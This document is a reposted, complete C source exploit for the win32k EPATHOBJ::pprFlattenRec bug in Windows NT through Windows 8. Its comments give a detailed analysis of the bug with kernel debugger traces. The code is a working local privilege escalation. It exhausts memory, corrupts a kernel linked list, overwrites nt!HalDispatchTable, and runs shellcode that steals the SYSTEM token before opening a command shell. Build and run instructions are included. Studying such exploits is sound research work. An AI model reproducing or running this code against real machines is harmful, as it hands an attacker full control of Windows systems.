Windows 8 to NT EPATHOBJ Local Ring 0 Exploit #ifndef WIN32_NO_STATUS# define WIN32_NO_STATUS #endif #include <stdio.h> #include <stdarg.h> #include <stddef.h> #include <windows.h> #include <assert.h> #ifdef WIN32_NO_STATUS # undef WIN32_NO_STATUS #endif #include <ntstatus.h> #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #pragma comment(lib, "shell32") #pragma comment(linker, "/SECTION:.text,ERW") #ifndef PAGE_SIZE # define PAGE_SIZE 0x1000 #endif #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGIONS 8192 #define CYCLE_TIMEOUT 10000 // // -------------------------------------------------- // Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit // ----------------------------------------- taviso () cmpxchg8b com ----- // // INTRODUCTION // // There's a pretty obvious bug in win32k!EPATHOBJ::pprFlattenRec where the // PATHREC object returned by win32k!EPATHOBJ::newpathrec doesn't initialise the // next list pointer. The bug is really nice, but exploitation when // allocations start failing is tricky. // // ; BOOL __thiscall EPATHOBJ::newpathrec(EPATHOBJ *this, // PATHRECORD **pppr, // ULONG *pcMax, // ULONG cNeeded) // .text:BFA122CA mov esi, [ebp+ppr] // .text:BFA122CD mov eax, [esi+PATHRECORD.pprPrev] // .text:BFA122D0 push edi // .text:BFA122D1 mov edi, [ebp+pprNew] // .text:BFA122D4 mov [edi+PATHRECORD.pprPrev], eax // .text:BFA122D7 lea eax, [edi+PATHRECORD.count] // .text:BFA122DA xor edx, edx // .text:BFA122DC mov [eax], edx // .text:BFA122DE mov ecx, [esi+PATHRECORD.flags] // .text:BFA122E1 and ecx, not (PD_BEZIER) // .text:BFA122E4 mov [edi+PATHRECORD.flags], ecx // .text:BFA122E7 mov [ebp+pprNewCountPtr], eax // .text:BFA122EA cmp [edi+PATHRECORD.pprPrev], edx // .text:BFA122ED jnz short loc_BFA122F7 // .text:BFA122EF mov ecx, [ebx+EPATHOBJ.ppath] // .text:BFA122F2 mov [ecx+PATHOBJ.pprfirst], edi // // It turns out this mostly works because newpathrec() is backed by newpathalloc() // which uses PALLOCMEM(). PALLOCMEM() will always zero the buffer returned. // // ; PVOID __stdcall PALLOCMEM(size_t size, int tag) // .text:BF9160D7 xor esi, esi // .text:BF9160DE push esi // .text:BF9160DF push esi // .text:BF9160E0 push [ebp+tag] // .text:BF9160E3 push [ebp+size] // .text:BF9160E6 call _HeavyAllocPool () 16 ; HeavyAllocPool(x,x,x,x) // .text:BF9160EB mov esi, eax // .text:BF9160ED test esi, esi // .text:BF9160EF jz short loc_BF9160FF // .text:BF9160F1 push [ebp+size] ; size_t // .text:BF9160F4 push 0 ; int // .text:BF9160F6 push esi ; void * // .text:BF9160F7 call _memset // // However, the PATHALLOC allocator includes it's own freelist implementation, and // if that codepath can satisfy a request the memory isn't zeroed and returned // directly to the caller. This effectively means that we can add our own objects // to the PATHRECORD chain. // // We can force this behaviour under memory pressure relatively easily, I just // spam HRGN objects until they start failing. This isn't super reliable, but it's // good enough for testing. // // // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on // // failure. Seriously, do some damn QA Microsoft, wtf. // for (Size = 1 << 26; Size; Size >>= 1) { // while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1)) // ; // } // // Adding user controlled blocks to the freelist is a little trickier, but I've // found that flattening large lists of bezier curves added with PolyDraw() can // accomplish this reliably. The code to do this is something along the lines of: // // for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) { // Points[PointNum].x = 0x41414141 >> 4; // Points[PointNum].y = 0x41414141 >> 4; // PointTypes[PointNum] = PT_BEZIERTO; // } // // for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) { // BeginPath(Device); // PolyDraw(Device, Points, PointTypes, PointNum); // EndPath(Device); // FlattenPath(Device); // FlattenPath(Device); // EndPath(Device); // } // // We can verify this is working by putting a breakpoint after newpathrec, and // verifying the buffer is filled with recognisable values when it returns: // // kd> u win32k!EPATHOBJ::pprFlattenRec+1E // win32k!EPATHOBJ::pprFlattenRec+0x1e: // 95c922b8 e8acfbffff call win32k!EPATHOBJ::newpathrec (95c91e69) // 95c922bd 83f801 cmp eax,1 // 95c922c0 7407 je win32k!EPATHOBJ::pprFlattenRec+0x2f (95c922c9) // 95c922c2 33c0 xor eax,eax // 95c922c4 e944020000 jmp win32k!EPATHOBJ::pprFlattenRec+0x273 (95c9250d) // 95c922c9 56 push esi // 95c922ca 8b7508 mov esi,dword ptr [ebp+8] // 95c922cd 8b4604 mov eax,dword ptr [esi+4] // kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+23 "dd poi(ebp-4) L1; gc" // kd> g // fe938fac 41414140 // fe938fac 41414140 // fe938fac 41414140 // fe938fac 41414140 // fe938fac 41414140 // // The breakpoint dumps the first dword of the returned buffer, which matches the // bezier points set with PolyDraw(). So convincing pprFlattenRec() to move // EPATHOBJ->records->head->next->next into userspace is no problem, and we can // easily break the list traversal in bFlattten(): // // BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this) // { // EPATHOBJ *pathobj; // esi () 1 // PATHOBJ *ppath; // eax () 1 // BOOL result; // eax () 2 // PATHRECORD *ppr; // eax () 3 // // pathobj = this; // ppath = this->ppath; // if ( ppath ) // { // for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext ) // { // if ( ppr->flags & PD_BEZIER ) // { // ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr); // if ( !ppr ) // goto LABEL_2; // } // } // pathobj->fl &= 0xFFFFFFFE; // result = 1; // } // else // { // LABEL_2: // result = 0; // } // return result; // } // // All we have to do is allocate our own PATHRECORD structure, and then spam // PolyDraw() with POINTFIX structures containing co-ordinates that are actually // pointers shifted right by 4 (for this reason the structure must be aligned so // the bits shifted out are all zero). // // We can see this in action by putting a breakpoint in bFlatten when ppr has // moved into userspace: // // kd> u win32k!EPATHOBJ::bFlatten // win32k!EPATHOBJ::bFlatten: // 95c92517 8bff mov edi,edi // 95c92519 56 push esi // 95c9251a 8bf1 mov esi,ecx // 95c9251c 8b4608 mov eax,dword ptr [esi+8] // 95c9251f 85c0 test eax,eax // 95c92521 7504 jne win32k!EPATHOBJ::bFlatten+0x10 (95c92527) // 95c92523 33c0 xor eax,eax // 95c92525 5e pop esi // kd> u // win32k!EPATHOBJ::bFlatten+0xf: // 95c92526 c3 ret // 95c92527 8b4014 mov eax,dword ptr [eax+14h] // 95c9252a eb14 jmp win32k!EPATHOBJ::bFlatten+0x29 (95c92540) // 95c9252c f6400810 test byte ptr [eax+8],10h // 95c92530 740c je win32k!EPATHOBJ::bFlatten+0x27 (95c9253e) // 95c92532 50 push eax // 95c92533 8bce mov ecx,esi // 95c92535 e860fdffff call win32k!EPATHOBJ::pprFlattenRec (95c9229a) // // So at 95c9252c eax is ppr->next, and the routine checks for the PD_BEZIERS // flags (defined in winddi.h). Let's break if it's in userspace: // // kd> ba e 1 95c9252c "j (eax < poi(nt!MmUserProbeAddress)) 'gc'; ''" // kd> g // 95c9252c f6400810 test byte ptr [eax+8],10h // kd> r // eax=41414140 ebx=95c1017e ecx=97330bec edx=00000001 esi=97330bec edi=0701062d // eip=95c9252c esp=97330be4 ebp=97330c28 iopl=0 nv up ei pl nz na po nc // cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202 // win32k!EPATHOBJ::bFlatten+0x15: // 95c9252c f6400810 test byte ptr [eax+8],10h ds:0023:41414148=?? // // The question is how to turn that into code execution? It's obviously trivial to // call prFlattenRec with our userspace PATHRECORD..we can do that by setting // PD_BEZIER in our userspace PATHRECORD, but the early exit on allocation failure // poses a problem. // // Let me demonstrate calling it with my own PATHRECORD: // // // Create our PATHRECORD in userspace we will get added to the EPATHOBJ // // pathrecord chain. // PathRecord = VirtualAlloc(NULL, // sizeof(PATHRECORD), // MEM_COMMIT | MEM_RESERVE, // PAGE_EXECUTE_READWRITE); // // // Initialise with recognisable debugging values. // FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC); // // PathRecord->next = (PVOID)(0x41414141); // PathRecord->prev = (PVOID)(0x42424242); // // // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from // // EPATHOBJ::bFlatten(), do that here. // PathRecord->flags = PD_BEZIERS; // // // Generate a large number of Bezier Curves made up of pointers to our // // PATHRECORD object. // for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) { // Points[PointNum].x = (ULONG)(PathRecord) >> 4; // Points[PointNum].y = (ULONG)(PathRecord) >> 4; // PointTypes[PointNum] = PT_BEZIERTO; // } // // kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+28 "j (dwo(ebp+8) < dwo(nt!MmUserProbeAddress)) ''; 'gc'" // kd> g // win32k!EPATHOBJ::pprFlattenRec+0x28: // 95c922c2 33c0 xor eax,eax // kd> dd ebp+8 L1 // a3633be0 00130000 // // The ppr object is in userspace! If we peek at it: // // kd> dd poi(ebp+8) // 00130000 41414141 42424242 00000010 cccccccc // 00130010 00000000 00000000 00000000 00000000 // 00130020 00000000 00000000 00000000 00000000 // 00130030 00000000 00000000 00000000 00000000 // 00130040 00000000 00000000 00000000 00000000 // 00130050 00000000 00000000 00000000 00000000 // 00130060 00000000 00000000 00000000 00000000 // 00130070 00000000 00000000 00000000 00000000 // // There's the next and prev pointer. // // kd> kvn // # ChildEBP RetAddr Args to Child // 00 a3633bd8 95c9253a 00130000 002bfea0 95c101ce win32k!EPATHOBJ::pprFlattenRec+0x28 (FPO: [Non-Fpo]) // 01 a3633be4 95c101ce 00000001 00000294 fe763360 win32k!EPATHOBJ::bFlatten+0x23 (FPO: [0,0,4]) // 02 a3633c28 829ab173 0701062d 002bfea8 7721a364 win32k!NtGdiFlattenPath+0x50 (FPO: [Non-Fpo]) // 03 a3633c28 7721a364 0701062d 002bfea8 7721a364 nt!KiFastCallEntry+0x163 (FPO: [0,3] TrapFrame @ a3633c34) // // The question is how to get PATHALLOC() to succeed under memory pressure so we // can make this exploitable? I'm quite proud of this list cycle trick, // here's how to turn it into an arbitrary write. // // First, we create a watchdog thread that will patch the list atomically // when we're ready. This is needed because we can't exploit the bug while // HeavyAllocPool is failing, because of the early exit in pprFlattenRec: // // .text:BFA122B8 call newpathrec ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong) // .text:BFA122BD cmp eax, 1 ; Check for failure // .text:BFA122C0 jz short continue // .text:BFA122C2 xor eax, eax ; Exit early // .text:BFA122C4 jmp early_exit // // So we create a list node like this: // // PathRecord->Next = PathRecord; // PathRecord->Flags = 0; // // Then EPATHOBJ::bFlatten() spins forever doing nothing: // // BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this) // { // /* ... */ // // for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext ) // { // if ( ppr->flags & PD_BEZIER ) // { // ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr); // } // } // // /* ... */ // } // // While it's spinning, we clean up in another thread, then patch the thread (we // can do this, because it's now in userspace) to trigger the exploit. The first // block of pprFlattenRec does something like this: // // if ( pprNew->pprPrev ) // pprNew->pprPrev->pprnext = pprNew; // // Let's make that write to 0xCCCCCCCC. // // DWORD WINAPI WatchdogThread(LPVOID Parameter) // { // // // This routine waits for a mutex object to timeout, then patches the // // compromised linked list to point to an exploit. We need to do this. // LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex () %p", // GetCurrentThreadId(), // Mutex); // // if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // // It looks like the main thread is stuck in a call to FlattenPath(), // // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // // up, and then patch the list to trigger our exploit. // while (NumRegion--) // DeleteObject(Regions[NumRegion]); // // LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord); // // InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); // // } else { // LogMessage(L_ERROR, "Mutex object did not timeout, list not patched"); // } // // return 0; // } // // PathRecord->next = PathRecord; // PathRecord->prev = (PVOID)(0x42424242); // PathRecord->flags = 0; // // ExploitRecord.next = NULL; // ExploitRecord.prev = 0xCCCCCCCC; // ExploitRecord.flags = PD_BEZIERS; // // Here's the output on Windows 8: // // kd> g // ******************************************************************************* // * * // * Bugcheck Analysis * // * * // ******************************************************************************* // // Use !analyze -v to get detailed debugging information. // // BugCheck 50, {cccccccc, 1, 8f18972e, 2} // *** WARNING: Unable to verify checksum for ComplexPath.exe // *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe // Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 ) // // Followup: MachineOwner // --------- // // nt!RtlpBreakWithStatusInstruction: // 810f46f4 cc int 3 // kd> kv // ChildEBP RetAddr Args to Child // a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0]) // a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo]) // a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4]) // a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6 // a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19 // a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868 // a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4]) // a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c) // a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo]) // a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0]) // a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4]) // a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14) // 0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0]) // 0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0]) // WARNING: Stack unwind information not available. Following frames may be wrong. // 0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f // 0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade // 0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo]) // 0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [sEH]) // 0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo]) // kd> .trap a03aba2c // ErrCode = 00000002 // eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8 // eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0 nv up ei ng nz na pe nc // cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286 // win32k!EPATHOBJ::pprFlattenRec+0x82: // 8f18972e 8918 mov dword ptr [eax],ebx ds:0023:cccccccc=???????? // kd> vertarget // Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible // Product: WinNt, suite: TerminalServer SingleUserTS // Built by: 9200.16581.x86fre.win8_gdr.130410-1505 // Machine Name: // Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48 // Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00) // System Uptime: 0 days 0:02:30.432 // kd> .bugcheck // Bugcheck code 00000050 // Arguments cccccccc 00000001 8f18972e 00000002 // // EXPLOITATION // // We're somewhat limited with what we can do, as we don't control what's // written, it's always a pointer to a PATHRECORD object. We can clobber a // function pointer, but the problem is making it point somewhere useful. // // The solution is to make the Next pointer a valid sequence of instructions, // which jumps to our second stage payload. We have to do that in just 4 bytes // (unless you can find a better call site, let me know if you spot one). // // Thanks to progmboy for coming up with the solution: you reach back up the // stack and pull a SystemCall parameter out of the stack. It turns out // NtQueryIntervalProfile matches this requirement perfectly. // // INSTRUCTIONS // // C:\> cl ComplexPath.c // C:\> ComplexPath // // You might need to run it several times before we get the allocation we need, // it won't crash if it doesn't work, so you can keep trying. I'm not sure how // to improve that. // // CREDIT // // Tavis Ormandy <taviso () cmpxchg8b com> // progmboy <programmeboy () gmail com> // POINT Points[MAX_POLYPOINTS]; BYTE PointTypes[MAX_POLYPOINTS]; HRGN Regions[MAX_REGIONS]; ULONG NumRegion = 0; HANDLE Mutex; DWORD Finished = 0; // Log levels. typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL; BOOL LogMessage(LEVEL Level, PCHAR Format, ...); // Copied from winddi.h from the DDK #define PD_BEGINSUBPATH 0x00000001 #define PD_ENDSUBPATH 0x00000002 #define PD_RESETSTYLE 0x00000004 #define PD_CLOSEFIGURE 0x00000008 #define PD_BEZIERS 0x00000010 typedef struct _POINTFIX { ULONG x; ULONG y; } POINTFIX, *PPOINTFIX; // Approximated from reverse engineering. typedef struct _PATHRECORD { struct _PATHRECORD *next; struct _PATHRECORD *prev; ULONG flags; ULONG count; POINTFIX points[4]; } PATHRECORD, *PPATHRECORD; PPATHRECORD PathRecord; PATHRECORD ExploitRecord; PPATHRECORD ExploitRecordExit; enum { SystemModuleInformation = 11 }; enum { ProfileTotalIssues = 2 }; typedef struct _RTL_PROCESS_MODULE_INFORMATION { HANDLE Section; PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[256]; } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; typedef struct _RTL_PROCESS_MODULES { ULONG NumberOfModules; RTL_PROCESS_MODULE_INFORMATION Modules[1]; } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; FARPROC NtQuerySystemInformation; FARPROC NtQueryIntervalProfile; FARPROC PsReferencePrimaryToken; FARPROC PsLookupProcessByProcessId; PULONG HalDispatchTable; ULONG HalQuerySystemInformation; PULONG TargetPid; PVOID *PsInitialSystemProcess; // Search the specified data structure for a member with CurrentValue. BOOL FindAndReplaceMember(PDWORD Structure, DWORD CurrentValue, DWORD NewValue, DWORD MaxSize) { DWORD i, Mask; // Microsoft QWORD aligns object pointers, then uses the lower three // bits for quick reference counting. Mask = ~7; // Mask out the reference count. CurrentValue &= Mask; // Scan the structure for any occurrence of CurrentValue. for (i = 0; i < MaxSize; i++) { if ((Structure & Mask) == CurrentValue) { // And finally, replace it with NewValue. Structure = NewValue; return TRUE; } } // Member not found. return FALSE; } // This routine is injected into nt!HalDispatchTable by EPATHOBJ::pprFlattenRec. ULONG __stdcall ShellCode(DWORD Arg1, DWORD Arg2, DWORD Arg3, DWORD Arg4) { PVOID TargetProcess; // Record that the exploit completed. Finished = 1; // Fix the corrupted HalDispatchTable, HalDispatchTable[1] = HalQuerySystemInformation; // Find the EPROCESS structure for the process I want to escalate if (PsLookupProcessByProcessId(TargetPid, &TargetProcess) == STATUS_SUCCESS) { PACCESS_TOKEN SystemToken; PACCESS_TOKEN TargetToken; // Find the Token object for my target process, and the SYSTEM process. TargetToken = (PACCESS_TOKEN) PsReferencePrimaryToken(TargetProcess); SystemToken = (PACCESS_TOKEN) PsReferencePrimaryToken(*PsInitialSystemProcess); // Find the token in the target process, and replace with the system token. FindAndReplaceMember((PDWORD) TargetProcess, (DWORD) TargetToken, (DWORD) SystemToken, 0x200); } return 0; } DWORD WINAPI WatchdogThread(LPVOID Parameter) { // Here we wait for the main thread to get stuck inside FlattenPath(). WaitForSingleObject(Mutex, CYCLE_TIMEOUT); // It looks like we've taken control of the list, and the main thread // is spinning in EPATHOBJ::bFlatten. We can't continue because // EPATHOBJ::pprFlattenRec exit's immediately if newpathrec() fails. // So first, we clean up and make sure it can allocate memory. while (NumRegion) DeleteObject(Regions[--NumRegion]); // Now we switch out the Next pointer for our exploit record. As soon // as this completes, the main thread will stop spinning and continue // into EPATHOBJ::pprFlattenRec. InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); return 0; } // I use this routine to generate a table of acceptable stub addresses. The // 0x40 offset is the location of the PULONG parameter to // nt!NtQueryIntervalProfile. Credit to progmboy for coming up with this clever // trick. VOID __declspec(naked) HalDispatchRedirect(VOID) { __asm inc eax __asm jmp dword ptr [ebp+0x40]; // 0 __asm inc ecx __asm jmp dword ptr [ebp+0x40]; // 1 __asm inc edx __asm jmp dword ptr [ebp+0x40]; // 2 __asm inc ebx __asm jmp dword ptr [ebp+0x40]; // 3 __asm inc esi __asm jmp dword ptr [ebp+0x40]; // 4 __asm inc edi __asm jmp dword ptr [ebp+0x40]; // 5 __asm dec eax __asm jmp dword ptr [ebp+0x40]; // 6 __asm dec ecx __asm jmp dword ptr [ebp+0x40]; // 7 __asm dec edx __asm jmp dword ptr [ebp+0x40]; // 8 __asm dec ebx __asm jmp dword ptr [ebp+0x40]; // 9 __asm dec esi __asm jmp dword ptr [ebp+0x40]; // 10 __asm dec edi __asm jmp dword ptr [ebp+0x40]; // 11 // Mark end of table. __asm { _emit 0 _emit 0 _emit 0 _emit 0 } } int main(int argc, char **argv) { HANDLE Thread; HDC Device; ULONG Size; ULONG PointNum; HMODULE KernelHandle; PULONG DispatchRedirect; PULONG Interval; ULONG SavedInterval; RTL_PROCESS_MODULES ModuleInfo; LogMessage(L_INFO, "\r--------------------------------------------------\n" "\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n" "\r------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---\n" "\n"); NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile"); NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation"); Mutex = CreateMutex(NULL, FALSE, NULL); DispatchRedirect = (PVOID) HalDispatchRedirect; Interval = (PULONG) ShellCode; SavedInterval = Interval[0]; TargetPid = GetCurrentProcessId(); LogMessage(L_INFO, "NtQueryIntervalProfile () %p", NtQueryIntervalProfile); LogMessage(L_INFO, "NtQuerySystemInformation () %p", NtQuerySystemInformation); // Lookup the address of system modules. NtQuerySystemInformation(SystemModuleInformation, &ModuleInfo, sizeof ModuleInfo, NULL); LogMessage(L_DEBUG, "NtQuerySystemInformation() => %s () %p", ModuleInfo.Modules[0].FullPathName, ModuleInfo.Modules[0].ImageBase); // Lookup some system routines we require. KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName); HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; // Search for a ret instruction to install in the damaged HalDispatchTable. HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize) - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; LogMessage(L_INFO, "Discovered a ret instruction at %p", HalQuerySystemInformation); // Create our PATHRECORD in user space we will get added to the EPATHOBJ // pathrecord chain. PathRecord = VirtualAlloc(NULL, sizeof *PathRecord, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); LogMessage(L_INFO, "Allocated userspace PATHRECORD () %p", PathRecord); // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite // loop in EPATHOBJ::bFlatten(). PathRecord->flags = 0; PathRecord->next = PathRecord; PathRecord->prev = (PPATHRECORD)(0x42424242); LogMessage(L_INFO, " ->next @ %p", PathRecord->next); LogMessage(L_INFO, " ->prev @ %p", PathRecord->prev); LogMessage(L_INFO, " ->flags @ %u", PathRecord->flags); // Now we need to create a PATHRECORD at an address that is also a valid // x86 instruction, because the pointer will be interpreted as a function. // I've created a list of candidates in DispatchRedirect. LogMessage(L_INFO, "Searching for an available stub address..."); // I need to map at least two pages to guarantee the whole structure is // available. while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1), PAGE_SIZE * 2, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) { LogMessage(L_WARN, "\tVirtualAlloc(%#x) => %#x", *DispatchRedirect & ~(PAGE_SIZE - 1), GetLastError()); // This page is not available, try the next candidate. if (!*++DispatchRedirect) { LogMessage(L_ERROR, "No redirect candidates left, sorry!"); return 1; } } LogMessage(L_INFO, "Success, ExploitRecordExit () %#0x", *DispatchRedirect); // This PATHRECORD must terminate the list and recover. ExploitRecordExit = (PPATHRECORD) *DispatchRedirect; ExploitRecordExit->next = NULL; ExploitRecordExit->prev = NULL; ExploitRecordExit->flags = PD_BEGINSUBPATH; ExploitRecordExit->count = 0; LogMessage(L_INFO, " ->next @ %p", ExploitRecordExit->next); LogMessage(L_INFO, " ->prev @ %p", ExploitRecordExit->prev); LogMessage(L_INFO, " ->flags @ %u", ExploitRecordExit->flags); // This is the second stage PATHRECORD, which causes a fresh PATHRECORD // allocated from newpathrec to nt!HalDispatchTable. The Next pointer will // be copied over to the new record. Therefore, we get // // nt!HalDispatchTable[1] = &ExploitRecordExit. // // So we make &ExploitRecordExit a valid sequence of instuctions here. LogMessage(L_INFO, "ExploitRecord () %#0x", &ExploitRecord); ExploitRecord.next = (PPATHRECORD) *DispatchRedirect; ExploitRecord.prev = (PPATHRECORD) &HalDispatchTable[1]; ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH; ExploitRecord.count = 4; LogMessage(L_INFO, " ->next @ %p", ExploitRecord.next); LogMessage(L_INFO, " ->prev @ %p", ExploitRecord.prev); LogMessage(L_INFO, " ->flags @ %u", ExploitRecord.flags); LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4); // Generate a large number of Belier Curves made up of pointers to our // PATHRECORD object. for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) { Points[PointNum].x = (ULONG)(PathRecord) >> 4; Points[PointNum].y = (ULONG)(PathRecord) >> 4; PointTypes[PointNum] = PT_BEZIERTO; } // Switch to a dedicated desktop so we don't spam the visible desktop with // our Lines (Not required, just stops the screen from redrawing slowly). SetThreadDesktop(CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL)); // Get a handle to this Desktop. Device = GetDC(NULL); // Take ownership of Mutex WaitForSingleObject(Mutex, INFINITE); // Spawn a thread to cleanup Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL); LogMessage(L_INFO, "Begin CreateRoundRectRgn cycle"); // We need to cause a specific AllocObject() to fail to trigger the // exploitable condition. To do this, I create a large number of rounded // rectangular regions until they start failing. I don't think it matters // what you use to exhaust paged memory, there is probably a better way. // // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on // failure. Seriously, do some damn QA Microsoft, wtf. for (Size = 1 << 26; Size; Size >>= 1) { while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1)) NumRegion++; } LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion); LogMessage(L_INFO, "Flattening curves..."); for (PointNum = MAX_POLYPOINTS; PointNum && !Finished; PointNum -= 3) { BeginPath(Device); PolyDraw(Device, Points, PointTypes, PointNum); EndPath(Device); FlattenPath(Device); FlattenPath(Device); // Test if exploitation succeeded. NtQueryIntervalProfile(ProfileTotalIssues, Interval); // Repair any damage. *Interval = SavedInterval; EndPath(Device); } if (Finished) { LogMessage(L_INFO, "Success, launching shell...", Finished); ShellExecute(NULL, "open", "cmd", NULL, NULL, SW_SHOW); LogMessage(L_INFO, "Press any key to exit..."); getchar(); ExitProcess(0); } // If we reach here, we didn't trigger the condition. Let the other thread know. ReleaseMutex(Mutex); WaitForSingleObject(Thread, INFINITE); ReleaseDC(NULL, Device); // Try again... LogMessage(L_ERROR, "No luck, run exploit again (it can take several attempts)"); LogMessage(L_INFO, "Press any key to exit..."); getchar(); ExitProcess(1); } // A quick logging routine for debug messages. BOOL LogMessage(LEVEL Level, PCHAR Format, ...) { CHAR Buffer[1024] = {0}; va_list Args; va_start(Args, Format); vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args); va_end(Args); switch (Level) { case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break; case L_INFO: fprintf(stdout, "[+] %s\n", Buffer); break; case L_WARN: fprintf(stderr, " [*] %s\n", Buffer); break; case L_ERROR: fprintf(stderr, "[!] %s\n", Buffer); break; } fflush(stdout); fflush(stderr); return TRUE; } Sursa: Windows 8 to NT EPATHOBJ Local Ring 0 Exploit - CXSecurity.com
